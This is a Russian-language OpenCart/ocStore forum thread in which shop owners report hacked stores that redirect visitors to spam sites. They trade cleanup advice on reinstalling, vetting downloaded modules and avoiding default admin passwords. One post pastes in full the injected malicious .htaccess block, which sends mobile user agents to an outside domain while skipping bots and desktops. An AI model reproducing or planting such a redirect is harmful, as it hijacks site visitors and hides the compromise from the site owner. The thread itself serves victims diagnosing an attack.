Перейти к содержанию
vector

Появилась переадресация на mysafemedz.com, что это?

Рекомендуемые сообщения

Добрый день! Подскажите, откуда появилась переадресация на какой-то непонятный сайт mysafemedz. com

из вместо ссылок на страницы:

1). О нас

2). Информация о доставке

3). Условия соглашения

4). Наши партнёры

5). Как нас найти

Все эти страницы создаются в разделе Каталог->Статьи

Пытался переименовать ссылки в админке на эти страницы, но история таже. Или на сайт или ошибка 502 Bad Gateway.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вирус однако! :ph34r:

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Где именно вирус? На хосте или у меня?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Пойду заварю коффейку покрепче! Ну а иначе как ещё Вам дать точный ответ,как не по кофейной гуще гадая.

  • +1 2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Загляните в свой  htacsess   ,скорей всего вирус переписал его.

  • +1 2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

одновременно было взломано куча сайтов, на разных хостингах...

у многих было перенаправление на этот сайт mysafemedz. com

у меня тоже дня 3-4 назад..

 

был изменен файл htacsess

и в папке dawnoad была куча файлов всяких разных.

 

заменил пароли все, файлы удалил,

файл htacсess изменил на новый.

 

Сегодня хостер отключил сайты. Говорит спамят....((

 

что делать, где искать..?

айболитом сайт проверял - показывал вредоносный файл где то здесь

php excel - не знаю что с ним не так и где искать..

теперь айболит не работает (((

Хостер не включит сайт пока все проблемы не решу..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

У меня такая же беда. Ко всему вышесказанному добавлю еще, что в админке в Загрузках лежит файл info.php3.9ff4d3f2cd9c13d89382e0475b291494. Нужно копаться в файлах загруженных в папку download. К сожалению я ее случайно удалил.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вот еще админ хостера прислал:

/docs/system/PHPExcel/Classes/PHPExcel

 

как я и говорил - айболит показывал тоже самое,

это модуль эксель импрот экспрот - только какой не помню - найду напишу.

 

Копец модули получается качать тоже нельзя? )) я их только с этого сайта беру...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вот файл что качал и устанваливал:

 

export-import-xls-OCSTORE - 1.5.4.1

 

ссылка https://opencartforum.com/files/file/687-eksport-import-export-import-xls-dlia-ocstore-1541/

 

получается либо файл изначально с кодом,

либо в нем уязвимость и потом код там появляется?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Похоже, что эпидемия!!

На другом моем сайта, у другого хостера ocstore 1.5.4.1 в папке download

файл 404.php.393f651a5afbd676aa7e4202d08ea292. Прикрепляю.

А в .htaccess добавлено:

#########rataman##########
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !wpc_nr [NC]
RewriteCond %{HTTP_USER_AGENT} !(iphone|ipad|ipod|iphone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://skriptogram.ru/?i=2043&l=1 [L,R=302]
#########!rataman!#########

Проверил остальные свои сайты. Пока чистые.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Пойду заварю коффейку покрепче! Ну а иначе как ещё Вам дать точный ответ,как не по кофейной гуще гадая.

У меня было такое поганое настроение, пока я не прочел Ваш комментарий, спасибо  :-D 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

кто-нибудь нашел решение проблемы? сегодня в руки попал магазин с такой-же проблемой, рассылал спам, в папке download лежали веселые файлики

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

За эту неделю нашёл по просьбе эту бяку в трёх магазинах.В основном переписывается  htaccsess.

  • +1 2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

кто-нибудь нашел решение проблемы? сегодня в руки попал магазин с такой-же проблемой, рассылал спам, в папке download лежали веселые файлики

 

Если вы видите что к вам загрузили скрипты не относящиеся к opencart это говорит о том что вашем сайте есть уязвимость через которую злоумышленник может сделать с вашими файлами все что угодно. И пока уязвимость не будет устранена, вам будут загружать вредоносный код. Самый простой способ не допустить этого проверяйте все файлы которые вы скачиваете с интернета, в частности шаблоны которые были украдены и выложены в свободный доступ, а также различные модули. В данном случае лучше удалить все файлы и заново установить opencart, предварительно скачав картинки и дамп базы данных. Так как уязвимость может быть замаскирована под обычный код и не профессионал вряд ли его обнаружит.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Всем привет.

У меня на одном хостинге, два магазина, один тестовый, другой нормальный. У тестового пароль и логин admin. Так вот, захожу сегодня на хостинг, смотрю в корневую директорию, а там куча новых папок, с короткими названиями, типа kuy, lg и тп. В этих папках txt ридми фалы и html файлы, открыл html фаил, он ведет на американский сайт

  рекламирующий добавки и средства для похудания. Тестовый магазин, сегодня быстренько снес.

Самое интересное, что реальный магазин не тронули, ломанули только тестовый. Может потому что у меня там стоял стандартный шаблон Opencart, а в нем описание товаров на английском, амерские хакеры наверно подумали, что это крутой магазин, торгующий электроникой))
Посмотрел, на посетителей, реального инет магазина, было два посетителя, один с Канады, другой с США. Видать и его пытались ломануть, но пароль к админке не смогли подобрать.

Я вот только не пойму, как они магазин ломанули, неужели через админку? Теперь наверно и от хостинга пароль придется менять.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Думаю через админку ломанули магазин, а уже через админку и хостинг (если такое возможно конечно)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

admin/admin и вы еще спрашиваете "как?".

издеваетесь?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А подскажите, вот у меня в папке gownload тоже около 10 файлов с кракозяблами в названии. Мне их удалить? А как восстановить htaccess? У меня таких файла три штуки в разных папках. Что с ними сделать надо?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

для начала надо разобраться, что за файлы.

htaccess - без излишеств можно взять из архива используемой версии движка.

но если добавляли в него правила/настройки - НЕЛЬЗЯ бездумно перезаписывать свой файл оригинальным.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А подскажите, вот у меня в папке gownload тоже около 10 файлов с кракозяблами в названии. Мне их удалить?

удаляйте, не удаляйте, через пару дней они там снова будут.

 

А как восстановить htaccess?

с чего вы взяли, что файл изменен?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ок. Вот мои три файла htaccess

 

вот, который в VQMOD:

 

# Prevent Directoy listing
Options -Indexes

<FilesMatch "\.(xml|cache)">
Order deny,allow
Deny from all
</FilesMatch>

 

Вот который в html public

(только я там заменила кое-что на ----------, т.к. не знаю, можно ли это выкладывать.)

 

# 1.To use URL Alias you need to be running apache with mod_rewrite enabled.

# 2. In your opencart directory rename htaccess.txt to .htaccess.

# For any support issues please visit: http://www.opencart.com

Options +FollowSymlinks

# Prevent Directoy listing
Options -Indexes

# Prevent Direct Access to files
<FilesMatch "\.(tpl|ini|log)">
Order deny,allow
Deny from all
</FilesMatch>

# SEO URL Settings
RewriteEngine On
# If your opencart installation does not run on the main web folder make sure you folder it does run in ie. / becomes /shop/

RewriteBase /
RewriteRule ^sitem----------------------------------------------------------------------
RewriteRule ^goo------------------------------------------------------------------------
RewriteRule ^dow-----------------------------------------------------------------------
RewriteCond %--------------------------------------------------------------------------
RewriteCond %{------------------------------------------------------------------------
RewriteCond %{------------------------------------------------------------------------
RewriteRule ^([-------------------------------------------------------------------------

### Additional Settings that may need to be enabled for some servers
### Uncomment the commands by removing the # sign in front of it.
### If you get an "Internal Server Error 500" after enabling any of the following settings, restore the # as this means your host doesn't allow that.

# 1. If your cart only allows you to add one item at a time, it is possible register_globals is on. This may work to disable it:
# php_flag register_globals off

# 2. If your cart has magic quotes enabled, This may work to disable it:
# php_flag magic_quotes_gpc Off

# 3. Set max upload file size. Most hosts will limit this and not allow it to be overridden but you can try
# php_value upload_max_filesize 999M

# 4. set max post size. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value post_max_size 999M

# 5. set max time script can take. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_execution_time 200

# 6. set max time for input to be recieved. Uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_input_time 200

# 7. disable open_basedir limitations
# php_admin_value open_basedir none

 

А вот, который в /public_html/admin/view/javascript/ckeditor/.htaccess

 

#

# Copyright © 2003-2012, CKSource - Frederico Knabben. All rights reserved.
# For licensing, see LICENSE.html or http://ckeditor.com/license
#

#
# On some specific Linux installations you could face problems with Firefox.
# It could give you errors when loading the editor saying that some illegal
# characters were found (three strange chars in the beginning of the file).
# This could happen if you map the .js or .css files to PHP, for example.
#
# Those characters are the Byte Order Mask (BOM) of the Unicode encoded files.
# All FCKeditor files are Unicode encoded.
#

AddType application/x-javascript .js
AddType text/css .css

#
# If PHP is mapped to handle XML files, you could have some issues. The
# following will disable it.
#

AddType text/xml .xml

 

 

Можете ли вы, уважаемые знатоки, глянуть - они правильные или нет?

Спасибо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

чистые.

в корне магазина (второй) скрывать нечего - он базовый.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Я посмотрела на куки, которые создаются при отображении моей страницы, и обнаружила, что записываются куки с эдак так 20 сайтов! Там есть и Алибаба, и Алиэкспресс, и Мегого.ру, и 777...ру и много другого. А еще через "Отображение кода страницы" в браузере я вижу, что при отображении сайта идет обращение только с моему сайту (мое доменное имя) и один раз в стороннему виджету "101виджет".

Правильно ли я понимаю, что надо убрать и этот 101виджет. А далее смотреть: если куки появятся заново - то баг где-то именно в коде сайта, а не на стороне?

Ход правильный?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Сторонние куки сайтов могут быть от всяких лайко-шара-твито-кнопочек и счетчиков статистики, которые вы ставили

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Да. Я это понимаю. Поэтому я временно убрала все счетчики, метрику, аналитикс, ВК, кнопочки. Осталось лишь "101виджет".

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.